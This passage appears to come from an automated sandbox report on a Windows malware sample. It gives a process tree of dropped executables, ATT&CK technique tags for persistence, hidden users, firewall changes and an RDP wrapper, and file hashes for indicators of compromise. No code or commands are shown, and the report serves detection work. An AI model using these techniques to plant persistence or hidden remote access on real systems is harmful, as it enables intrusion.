        PID:2076

C:\ProgramData\CardWindows\CDevice.exe
C:\ProgramData\CardWindows\CDevice.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2640
- C:\ProgramData\CardWindows\sysdevices.exe
  C:\ProgramData\CardWindows\sysdevices.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2180
- - C:\ProgramData\CardWindows\sysdevices.exe
    C:\ProgramData\CardWindows\sysdevices.exe /tray
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: SetClipboardViewer
    PID:1100
- C:\ProgramData\CardWindows\sysdevices.exe
  C:\ProgramData\CardWindows\sysdevices.exe /tray
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\CardWindows\Builder2.exe

Filesize
368KB

MD5
5bc1cdb63ab6345843d7254ee51eb3cd

SHA1
54b5ec6185bbb3d33c17fd24c6143cf9372168b2

SHA256
5e0c07ccca39ab7e0d5a59d7f71b79a6c786a9ef65e3c53f1934016bf490d2ae

SHA512
6768769a22e4075eb3c2bbe8784e3eea79f0d2b709f43627742adc9b6610ed0f3d4f7327e6d10f898f68e7bf808c540c76ae2098b803ff784a829066151b980d

Download Submit
C:\ProgramData\CardWindows\CDevice.exe

Filesize
6.0MB

MD5
60478b65ab22e759c71f1923edb1bbab

SHA1
4268fc2bf9ff27ec280416b12bb0de96e9ae718d

SHA256
047274a242de93573a5f83fb152554a68dfa12ac877f5f9919dec5e62b70ada0

SHA512
2921917b17de2ef41e10619d86a5a4a34fe9da8d05870135781342a7c6b171827e868f351d9961fa4844bb37a29ab2278d6d38ce231022f820a7310e97669580

Download Submit
C:\ProgramData\CardWindows\RDP.exe

Filesize
1.8MB

MD5
06500c519e9a20c6851d55e4ec6a1bff

SHA1
d09baa50160cd02e31f3f617ea24e1f655dd67cb

SHA256
3a427942a462adc64695f62480b63470edef3e46599442e6fb517397967475d0

SHA512
217ff7685d97c6563a57497620cfa33e21683ec963c69b77054d04a339ffddd198e0835e73f2cce1606ce860f91feb1463ced22b392049d1b693e471d30bcec8

Download Submit
C:\ProgramData\CardWindows\Russian.lg

Filesize
48KB

MD5
e44e34bc285b709f08f967325d9c8be1

SHA1
e73f05c6a980ec9d006930c5343955f89579b409

SHA256
1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b

SHA512
576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727

Download Submit
C:\ProgramData\CardWindows\SysInstall.bat

Filesize
1KB

MD5
a00d1b7d978dcd3728e14c3f0e2386df

SHA1
596deee85bd6521c9d3fb7ffe3654aa0b386e9ed

SHA256
00baf3f49d72d9ae56cd5dbfbcd0a3a87b88ae3e768cbfe8a77769fd443a1cd5

SHA512
fe8a3752ba3bfddeb979f0a3cb8787218525057b873481f24169c6629851f862059ceb1cc52ed03f6b1bea87866833a107226b6a1a5ab969b959de0d56987c80

Download Submit
C:\ProgramData\CardWindows\WinUpdate.exe

Filesize
4.3MB

MD5
436658cb9c13960ecdb332ec02cc1388

SHA1
33c6b18a1a0ef78fbc9496893dd32bbce7fd47ff

SHA256
ba83d27a14161c57f58bed535843fc3cd64b39853e787b01e73517360e9923a7

SHA512
231b82bb53ef894b1907a0c644dc9ec7a6267783193310f97200be37beb1805462fa834bc7e46b7e3c03e149602169373549c6e937744e9fdd9e56a34e731ab4

Download Submit
C:\ProgramData\CardWindows\config_set.reg

Filesize
11KB

MD5
82f7c0371b66396fa77327164ebdc663

SHA1
01f04fd37ad25fb4b23a145d75f2eb02204c7023

SHA256
0151be83dd9f7f4db86cb94642bfbc339cdd1d67f6b8a15ac74feac735986e5d

SHA512
b497191464674f5ea27b26ae5ea3a381e5ee34bc5515164a20c8c40ee6788457c9bfbf39f0a27b68737c25ba0f09bc0510bdf6d4fee0c0679288d96ba63a2622

Download Submit
C:\ProgramData\CardWindows\start.exe

Filesize
394KB

MD5
e58793d6f2eb99a540797b64fa11a9e3

SHA1
b3638113405efc8eadc7d7638d6d47f5319cf811

SHA256
1a978563255ada2ee332405f2a553842e131475f06e6dfaa38166358bbd9683b

SHA512
05f372d2b97764745922d0a4ad908d8ae0b439109e3702824cc162ed0b4f1347381481469943f5521a8bf90471e1cbc2fad088bf33a4ea8224c187b1f8a8ec22

Download Submit
C:\ProgramData\CardWindows\start1.exe

Filesize
394KB

MD5
8c83dc3eb8124dd9cdaa95a0a1ad45d4

SHA1
9428c90a79281d5dc84205e435833f0c75f4ae3c

SHA256
35c5a75bce725f0132ebd59c5c8f090df3f0fb70e8f0f83cad8f9983a58a887b

SHA512
f2a1856ad6189fd189d64922e80201957f19601f05783a1b5543bb62f4e2921074a3dc522bf4b4307ea1ac2f1e2e18de9384d86a721073a332d75ac309c82d5d

Download Submit
C:\ProgramData\RDP\RDPWInst.exe

Filesize
1.3MB

MD5
9c257b1d15817a818a675749f0429130

SHA1
234d14da613c1420ea17de60ab8c3621d1599f6f

SHA256
b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c

SHA512
b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

Download Submit
C:\ProgramData\RDP\RDPWrapper.exe

Filesize
1.6MB

MD5
e4814efdb3d6761683665c487a02ef2b

SHA1
ecd25ee74af98658000e36b90c58af628b6ab6b8

SHA256
5f4aa202be2bb72123a8aac89322e00bf8d8daf027d510bb368df3dd093a7e23

SHA512
982558f59250bc213de5f27e7aac5fa5975e0ab9c979d23e4836b0a493c598d1d804c42d5a9faa1214892b4b1c2c6733be44a00966f65bdbb62946198d08d0e5

Download Submit
C:\ProgramData\RDP\RDPWrapper_run.exe

Filesize
368KB

MD5
35862d6de7d5f5a21a111f4e9c831839

SHA1
891e59e3a6798ac60ef333cdfb7969ef02a3e77c

SHA256
5f701eb1a3d0aeea8242431cf44b6ceccb364c2f430b8577bcfa4e6a3fca7b55

SHA512
00868a01af48be7d2c5c619891c77620e616ac05969c2c3dd146f551976b59be476ce6cbbaf87888aa14d5de2aa498a469440f0085f1ae063e7681e7a44cef56

Download Submit
C:\ProgramData\RDP\run.bat

Filesize
612B

MD5
4e6a1033e3c2f39db397d392fe0d7c77

SHA1
11526234cd216334902d51665529c2b9be7acc05

SHA256
2eb8001ce06e7b2764fb7b4e637d53583e365640e72a3d53e1d3b4790ae306d4

SHA512
395293d8ecd67f4c32702b11fdf0761f9e283346274ee1e4c4a3f47672fc683be4917fd87da2fde4e3d7e986e3884799329f9f28082e89f75aa17ca38c46dceb

Download Submit
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

Filesize
36B

MD5
8708699d2c73bed30a0a08d80f96d6d7

SHA1
684cb9d317146553e8c5269c8afb1539565f4f78

SHA256
a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

SHA512
38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5E0A.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5E3B.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
\ProgramData\CardWindows\WinDevInstall.exe

Filesize
6.5MB

MD5
ff45bfaab4ba3c580e91c4c23b6084cc

SHA1
bbcb6a4f8c1c5497e0af0634bc11f7fc3d552515

SHA256
edfa3acae5def78b893e14b977d9dc3b80d245047538b42bc9ededebe85e9e4c

SHA512
fb17e0ccca35848945fff3ba6418167dda3afe15919517169483bd26018bcddc272e448aa2e93cdbf6534b4a0a3288f326c7d394f6b6c74d4bb2e19217a022b0

Download Submit
\ProgramData\CardWindows\WinUpdate1.exe

Filesize
379KB

MD5
a36f89d64e0de0fe14ba911713df29eb

SHA1
7d700fa255f32aa37b82dc59826cf35300b250d4

SHA256
d1deecb8f672e32316a71444f1500be8381f64741445f138704876274e131a1c

SHA512
55ac398815ce5e00e18a839f0d12984488e6ee4e1eb69396a6bc01e12a86bc3256308f164cd52d5b6c733c77cb18f008a03921c831c62fd0d4d0a7b7184a6e57

Download Submit
\ProgramData\RDP\run.exe

Filesize
368KB

MD5
c4f61801834172c1f1973e8791311340

SHA1
de48c219435feda6680c474b445c8f548441abc7

SHA256
c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d

SHA512
8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7

Download Submit
memory/536-51-0x0000000000400000-0x0000000000468000-memory.dmp

Filesize
416KB

Download
memory/768-127-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/1100-226-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/1532-163-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/1692-59-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1744-95-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1956-89-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/2076-280-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/2104-72-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2180-282-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/2372-26-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/2392-157-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/2420-68-0x0000000000400000-0x0000000000468000-memory.dmp

Filesize
416KB

Download
memory/2492-152-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2640-302-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/2640-281-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/2640-319-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/2640-288-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/2640-312-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/2640-291-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/2640-295-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/2760-175-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/2832-227-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/3068-286-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/3068-297-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/3068-304-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/3068-290-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/3068-283-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download